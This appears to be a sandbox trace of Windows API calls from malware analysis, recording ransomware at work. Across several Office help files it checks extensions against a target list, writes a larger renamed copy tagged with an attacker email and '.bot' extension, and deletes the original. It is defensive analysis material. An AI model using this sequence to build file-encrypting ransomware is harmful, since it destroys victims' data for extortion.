	[0152.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC") returned 72
	[0152.774] lstrlenW (lpString=".zip") returned 4
	[0152.774] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0152.774] lstrlenW (lpString=".rar") returned 4
	[0152.774] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0152.774] lstrlenW (lpString=".bz2") returned 4
	[0152.774] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0152.774] lstrlenW (lpString=".7z") returned 3
	[0152.774] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0152.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC") returned 72
	[0152.774] lstrlenW (lpString=".dbf") returned 4
	[0152.774] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0152.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC") returned 72
	[0152.774] lstrlenW (lpString=".1cd") returned 4
	[0152.774] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0152.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC") returned 72
	[0152.774] lstrlenW (lpString=".jpg") returned 4
	[0152.774] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0152.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC") returned 72
	[0152.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC") returned 72
	[0152.774] lstrlenW (lpString=".doc") returned 4
	[0152.775] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0152.775] lstrlenW (lpString=".docx") returned 5
	[0152.775] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0152.775] lstrlenW (lpString=".pdf") returned 4
	[0152.775] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0152.775] lstrlenW (lpString=".xls") returned 4
	[0152.775] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0152.775] lstrlenW (lpString=".xlsx") returned 5
	[0152.775] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0152.775] lstrlenW (lpString=".ppt") returned 4
	[0152.775] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0152.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC") returned 72
	[0152.775] lstrlenW (lpString=".zip") returned 4
	[0152.775] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0152.775] lstrlenW (lpString=".rar") returned 4
	[0152.775] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0152.775] lstrlenW (lpString=".bz2") returned 4
	[0152.775] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0152.775] lstrlenW (lpString=".7z") returned 3
	[0152.775] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0152.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC") returned 72
	[0152.775] lstrlenW (lpString=".dbf") returned 4
	[0152.775] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0152.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC") returned 72
	[0152.775] lstrlenW (lpString=".1cd") returned 4
	[0152.775] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0152.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC") returned 72
	[0152.776] lstrlenW (lpString=".jpg") returned 4
	[0152.776] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0152.776] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0152.776] lstrlenW (lpString="VISIO.SHAPESHEET_COL.HXT") returned 24
	[0152.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.776] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=216) returned 1
	[0152.776] CloseHandle (hObject=0x2a0) returned 1
	[0152.776] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_col.hxt")) returned 0x20
	[0152.777] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.777] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.777] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0152.778] GetLastError () returned 0x0
	[0152.778] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xd8, lpOverlapped=0x0) returned 1
	[0152.779] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0152.779] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.780] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x104, lpOverlapped=0x0) returned 1
	[0152.780] SetEndOfFile (hFile=0x384) returned 1
	[0152.780] CloseHandle (hObject=0x384) returned 1
	[0152.780] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.780] SetEndOfFile (hFile=0x2a0) returned 1
	[0152.782] CloseHandle (hObject=0x2a0) returned 1
	[0152.782] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.783] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_col.hxt")) returned 1
	[0152.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT") returned 72
	[0152.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT") returned 72
	[0152.783] lstrlenW (lpString=".doc") returned 4
	[0152.783] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0152.783] lstrlenW (lpString=".docx") returned 5
	[0152.783] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0152.783] lstrlenW (lpString=".pdf") returned 4
	[0152.783] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0152.783] lstrlenW (lpString=".xls") returned 4
	[0152.783] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0152.783] lstrlenW (lpString=".xlsx") returned 5
	[0152.783] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0152.784] lstrlenW (lpString=".ppt") returned 4
	[0152.784] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0152.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT") returned 72
	[0152.784] lstrlenW (lpString=".zip") returned 4
	[0152.784] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0152.784] lstrlenW (lpString=".rar") returned 4
	[0152.784] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0152.784] lstrlenW (lpString=".bz2") returned 4
	[0152.784] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0152.784] lstrlenW (lpString=".7z") returned 3
	[0152.784] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0152.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT") returned 72
	[0152.784] lstrlenW (lpString=".dbf") returned 4
	[0152.784] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0152.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT") returned 72
	[0152.784] lstrlenW (lpString=".1cd") returned 4
	[0152.784] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0152.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT") returned 72
	[0152.784] lstrlenW (lpString=".jpg") returned 4
	[0152.784] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0152.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT") returned 72
	[0152.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT") returned 72
	[0152.784] lstrlenW (lpString=".doc") returned 4
	[0152.784] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0152.784] lstrlenW (lpString=".docx") returned 5
	[0152.784] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0152.784] lstrlenW (lpString=".pdf") returned 4
	[0152.784] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0152.784] lstrlenW (lpString=".xls") returned 4
	[0152.784] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0152.784] lstrlenW (lpString=".xlsx") returned 5
	[0152.785] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0152.785] lstrlenW (lpString=".ppt") returned 4
	[0152.785] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0152.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT") returned 72
	[0152.785] lstrlenW (lpString=".zip") returned 4
	[0152.785] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0152.785] lstrlenW (lpString=".rar") returned 4
	[0152.785] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0152.785] lstrlenW (lpString=".bz2") returned 4
	[0152.785] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0152.785] lstrlenW (lpString=".7z") returned 3
	[0152.785] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0152.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT") returned 72
	[0152.785] lstrlenW (lpString=".dbf") returned 4
	[0152.785] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0152.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT") returned 72
	[0152.785] lstrlenW (lpString=".1cd") returned 4
	[0152.785] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0152.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXT") returned 72
	[0152.785] lstrlenW (lpString=".jpg") returned 4
	[0152.785] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0152.785] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0152.785] lstrlenW (lpString="VISIO.SHAPESHEET_F_COL.HXK") returned 26
	[0152.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.786] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=114) returned 1
	[0152.786] CloseHandle (hObject=0x2a0) returned 1
	[0152.786] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_f_col.hxk")) returned 0x20
	[0152.786] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.786] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.786] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0152.787] GetLastError () returned 0x0
	[0152.787] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x72, lpOverlapped=0x0) returned 1
	[0152.788] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0152.789] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.789] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x108, lpOverlapped=0x0) returned 1
	[0152.789] SetEndOfFile (hFile=0x384) returned 1
	[0152.789] CloseHandle (hObject=0x384) returned 1
	[0152.789] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.789] SetEndOfFile (hFile=0x2a0) returned 1
	[0152.791] CloseHandle (hObject=0x2a0) returned 1
	[0152.792] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.792] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_f_col.hxk")) returned 1
	[0152.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK") returned 74
	[0152.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK") returned 74
	[0152.792] lstrlenW (lpString=".doc") returned 4
	[0152.792] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0152.792] lstrlenW (lpString=".docx") returned 5
	[0152.792] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0152.793] lstrlenW (lpString=".pdf") returned 4
	[0152.793] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0152.793] lstrlenW (lpString=".xls") returned 4
	[0152.793] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0152.793] lstrlenW (lpString=".xlsx") returned 5
	[0152.793] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0152.793] lstrlenW (lpString=".ppt") returned 4
	[0152.793] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0152.793] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK") returned 74
	[0152.793] lstrlenW (lpString=".zip") returned 4
	[0152.793] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0152.793] lstrlenW (lpString=".rar") returned 4
	[0152.793] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0152.793] lstrlenW (lpString=".bz2") returned 4
	[0152.793] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0152.793] lstrlenW (lpString=".7z") returned 3
	[0152.793] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0152.793] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK") returned 74
	[0152.793] lstrlenW (lpString=".dbf") returned 4
	[0152.793] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0152.793] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK") returned 74
	[0152.793] lstrlenW (lpString=".1cd") returned 4
	[0152.793] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0152.793] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK") returned 74
	[0152.793] lstrlenW (lpString=".jpg") returned 4
	[0152.793] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0152.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK") returned 74
	[0152.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK") returned 74
	[0152.794] lstrlenW (lpString=".doc") returned 4
	[0152.794] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0152.794] lstrlenW (lpString=".docx") returned 5
	[0152.794] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0152.794] lstrlenW (lpString=".pdf") returned 4
	[0152.794] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0152.794] lstrlenW (lpString=".xls") returned 4
	[0152.794] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0152.794] lstrlenW (lpString=".xlsx") returned 5
	[0152.794] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0152.794] lstrlenW (lpString=".ppt") returned 4
	[0152.794] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0152.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK") returned 74
	[0152.794] lstrlenW (lpString=".zip") returned 4
	[0152.794] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0152.794] lstrlenW (lpString=".rar") returned 4
	[0152.794] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0152.794] lstrlenW (lpString=".bz2") returned 4
	[0152.794] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0152.794] lstrlenW (lpString=".7z") returned 3
	[0152.794] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0152.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK") returned 74
	[0152.794] lstrlenW (lpString=".dbf") returned 4
	[0152.794] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0152.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK") returned 74
	[0152.795] lstrlenW (lpString=".1cd") returned 4
	[0152.795] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0152.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_F_COL.HXK") returned 74
	[0152.795] lstrlenW (lpString=".jpg") returned 4
	[0152.795] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0152.795] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0152.795] lstrlenW (lpString="VISIO.SHAPESHEET_K_COL.HXK") returned 26
	[0152.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.795] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=113) returned 1
	[0152.795] CloseHandle (hObject=0x2a0) returned 1
	[0152.795] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_k_col.hxk")) returned 0x20
	[0152.796] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.796] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.796] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.796] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.796] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0152.797] GetLastError () returned 0x0
	[0152.797] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x71, lpOverlapped=0x0) returned 1
	[0152.798] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0152.799] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.799] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x108, lpOverlapped=0x0) returned 1
	[0152.799] SetEndOfFile (hFile=0x384) returned 1
	[0152.799] CloseHandle (hObject=0x384) returned 1
	[0152.799] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.799] SetEndOfFile (hFile=0x2a0) returned 1
	[0152.801] CloseHandle (hObject=0x2a0) returned 1
	[0152.802] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.802] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_k_col.hxk")) returned 1
	[0152.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK") returned 74
	[0152.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK") returned 74
	[0152.803] lstrlenW (lpString=".doc") returned 4
	[0152.803] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0152.803] lstrlenW (lpString=".docx") returned 5
	[0152.803] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0152.803] lstrlenW (lpString=".pdf") returned 4
